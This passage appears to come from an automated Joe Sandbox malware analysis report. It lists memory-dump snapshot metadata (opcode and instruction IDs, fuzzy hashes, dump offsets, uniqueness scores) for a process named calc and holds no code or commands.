                                                                                                                                                                          • Opcode Fuzzy Hash: ebb27c961aba990e942a73ba611d49f965c0d0b08a1fbdb30b14eb7aeddd7802
                                                                                                                                                                          • Instruction Fuzzy Hash: AB214A719007498FCB10CF99C888BDEBFF8AB49324F14846AD458A7241D774A944CFA5

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292414204.000000000081D000.00000040.00000001.sdmp, Offset: 0081D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_81d000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42923414ea2d5de6b4b1b95498b9e481f0ea038a0fad52364e792c0754970896
                                                                                                                                                                          • Instruction ID: 3ad4ca132a93102992fa762006b8804193dcd12fc6d81ddcdf42d098b3fdc179
                                                                                                                                                                          • Opcode Fuzzy Hash: 42923414ea2d5de6b4b1b95498b9e481f0ea038a0fad52364e792c0754970896
                                                                                                                                                                          • Instruction Fuzzy Hash: F011B176404380DFCB15CF10D5C4B96BF72FF94328F2486A9D8054B656C33AD896CBA1

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292414204.000000000081D000.00000040.00000001.sdmp, Offset: 0081D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_81d000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42923414ea2d5de6b4b1b95498b9e481f0ea038a0fad52364e792c0754970896
                                                                                                                                                                          • Instruction ID: b34b7b809ab1a001903e4e8ca84a715e49fa3d3ab047db55ea6b4f62f6414f66
                                                                                                                                                                          • Opcode Fuzzy Hash: 42923414ea2d5de6b4b1b95498b9e481f0ea038a0fad52364e792c0754970896
                                                                                                                                                                          • Instruction Fuzzy Hash: E6119D76404280DFCB15CF10D5C4B56BF62FB98324F24C6A9D8494A656C33AE896CBA1

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8250c89ab4cd74d95eaada5701f69064a773184915951b9d7a496a29af7f7cc2
                                                                                                                                                                          • Instruction ID: be9808c57f5cf8f0ab87819c71cbfee8ea6dd8de9e29414a92caa2099e35be0e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8250c89ab4cd74d95eaada5701f69064a773184915951b9d7a496a29af7f7cc2
                                                                                                                                                                          • Instruction Fuzzy Hash: C01128B19007098FDB50CF9AC488BEEBFF8EB48324F248429D558A7241D778A944CFA5

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fbc1f76a163b4fe0c48a8d3f9a247441596e4307f02dcc773d1f1deade5f874b
                                                                                                                                                                          • Instruction ID: 355da2b602cf7d64e5da601118b1766a4a20c732b83cf5e2d9b123ec93415002
                                                                                                                                                                          • Opcode Fuzzy Hash: fbc1f76a163b4fe0c48a8d3f9a247441596e4307f02dcc773d1f1deade5f874b
                                                                                                                                                                          • Instruction Fuzzy Hash: 51116DB18006498FCB10CF99C888BEEFFF4EB48324F24842DD469A3240C774A944CFA5

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0c6011d6d9d24b6e3a63951afe9109686577e295975ca356c4698c94f70d9cfb
                                                                                                                                                                          • Instruction ID: a43772765d8f7c5b6090a3d1265bf194aa57c4e5fa3eeec059cd7dbbce6f018e
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c6011d6d9d24b6e3a63951afe9109686577e295975ca356c4698c94f70d9cfb
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF0597270C090CFCF65A66998A54703B91EFD23503625459C241C78A6CE20CC8BD3D9

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 41b7dee872d83c4edc294e39b299848a6d1205fb5bcaf29afdfbf3f14e4dca0f
                                                                                                                                                                          • Instruction ID: dd4e5e91085a5db9a9785a72a0e2a634fbc519f0d83cda84631dba16768bf01c
                                                                                                                                                                          • Opcode Fuzzy Hash: 41b7dee872d83c4edc294e39b299848a6d1205fb5bcaf29afdfbf3f14e4dca0f
                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0A33230D290CFCB165734AC128B93B71DED2314312406FD941C7552CD308C4BC765

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c07e15f8b023155065afc27a89d527b1e408df5439479b6f2fc743b8964ece40
                                                                                                                                                                          • Instruction ID: f5993db5bdff53d558fd38b5fbc5c096e555b29dd1908bf3c0adaaedefba95b8
                                                                                                                                                                          • Opcode Fuzzy Hash: c07e15f8b023155065afc27a89d527b1e408df5439479b6f2fc743b8964ece40
                                                                                                                                                                          • Instruction Fuzzy Hash: E0E026723056D04B8B1A73B864214EF3BBB9BC625930404AAF109CB795EF398C0B83D6

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 80b41c6683200ffd5a19cefc7c8d5f69b7f7dd717305440fd2c600578e1b2654
                                                                                                                                                                          • Instruction ID: 2e1def5b9240160b8b44a7a442b0e9ba6cb03b807580a7f71b828b59a4e80897
                                                                                                                                                                          • Opcode Fuzzy Hash: 80b41c6683200ffd5a19cefc7c8d5f69b7f7dd717305440fd2c600578e1b2654
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE06532708550AFD7109798D844BD93B95EF9A324F1940BAE6448B3B3C692DC418785

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9594b944e0fa8eeed0cea5c10d07ceae1bc5fa4bcd7853528fc24644f5e0f154
                                                                                                                                                                          • Instruction ID: 64b9ce9347f9e1a366ef9b8d5b3968153b53e195abee1c5d914af8707410b5c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 9594b944e0fa8eeed0cea5c10d07ceae1bc5fa4bcd7853528fc24644f5e0f154
                                                                                                                                                                          • Instruction Fuzzy Hash: 35E086317046146FD3005799D804FD97BDADFCE724F1540A6F7488B3B2CAA2EC418794

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cba09745e23b25ec867048555e8293de167c92c31466a4b611a396846e1f4e1a
                                                                                                                                                                          • Instruction ID: 9d110101776c987071f5553a69c0a21afe2e475a2b9126e5a5bc55c7232fa77c
                                                                                                                                                                          • Opcode Fuzzy Hash: cba09745e23b25ec867048555e8293de167c92c31466a4b611a396846e1f4e1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 80F06D7144D3888FC752DBB0ED2589D7FB19A562007268AEFC449C72A7D7300E01CB51

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b608cbe5195ae2d82bd46f33e840a370276178b21b01a0f34498f0e2311db8ec
                                                                                                                                                                          • Instruction ID: ef6a461c4f3ffa4e2316fafe1730ba9dea597071814ff8408bbaaccf8517f704
                                                                                                                                                                          • Opcode Fuzzy Hash: b608cbe5195ae2d82bd46f33e840a370276178b21b01a0f34498f0e2311db8ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 31D02B7230015047061932FC54104FF339F9BC5659310047ED10ADBB84EF749C0743D6

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0bea806ee9b712e18000ac5081635954b63af31db3efe86833ec95ebcec73c44
                                                                                                                                                                          • Instruction ID: 7c0f3465d5082597abef1f5d778d3e1e331e9241cdef61b3772bc64f6ebc04b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bea806ee9b712e18000ac5081635954b63af31db3efe86833ec95ebcec73c44
                                                                                                                                                                          • Instruction Fuzzy Hash: D5E0863270C5508B8B69FA26EA20C3533AAEFD8729353542DD705436598E30DC82C7E9

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 57999d389164f0d7fa9bd8c3078731d7c94bfe98630eff0ff63121160c1db838
                                                                                                                                                                          • Instruction ID: 8bfa1f00bca2c39e06e90cd76c311e202f3b3f17d134915affa342c9dad9116f
                                                                                                                                                                          • Opcode Fuzzy Hash: 57999d389164f0d7fa9bd8c3078731d7c94bfe98630eff0ff63121160c1db838
                                                                                                                                                                          • Instruction Fuzzy Hash: 59E012B6504308FFD701CFA0DC01B99BBBCEF05750F114492EA00D6150E3729A2497A5

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c0f94ced7aaa883c5506a4310798fed86a7844b2583ef7d9ebd81a0dee329244
                                                                                                                                                                          • Instruction ID: bd26e0d4e79cd40715459cf55bb96f173e2b55b5f9a5535a9a0604883666d496
                                                                                                                                                                          • Opcode Fuzzy Hash: c0f94ced7aaa883c5506a4310798fed86a7844b2583ef7d9ebd81a0dee329244
                                                                                                                                                                          • Instruction Fuzzy Hash: CAD05E70904608DFC790EFA4FD508AEB7B9EB542107628DA8C808D3319EB306F40DF90

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e156260cf28d78e9d6915ae411cc259c6167fb375c508c79d653d23443b062d1
                                                                                                                                                                          • Instruction ID: 1fdd6202067f4756085e93dc968abccb902124a84f096fe271b757bcbd9f73ea
                                                                                                                                                                          • Opcode Fuzzy Hash: e156260cf28d78e9d6915ae411cc259c6167fb375c508c79d653d23443b062d1
                                                                                                                                                                          • Instruction Fuzzy Hash: B4D0C9B694020CBBDB00CEA0DC06F9ABBACEB05700F1080A2BE04D6140E6729A1097A5

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08350131c7290b0850f7a33fccd1c019fea3092434ea0ca4ac2f653e2d91683e
                                                                                                                                                                          • Instruction ID: 14e494ca607d5c5e47deeadc898c468a59b6e8a9490f3f79f3f84965eee72053
                                                                                                                                                                          • Opcode Fuzzy Hash: 08350131c7290b0850f7a33fccd1c019fea3092434ea0ca4ac2f653e2d91683e
                                                                                                                                                                          • Instruction Fuzzy Hash: BAB0122002C70CCBF10027ED6804519736CA78C505F0201109609015510E5528008463

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions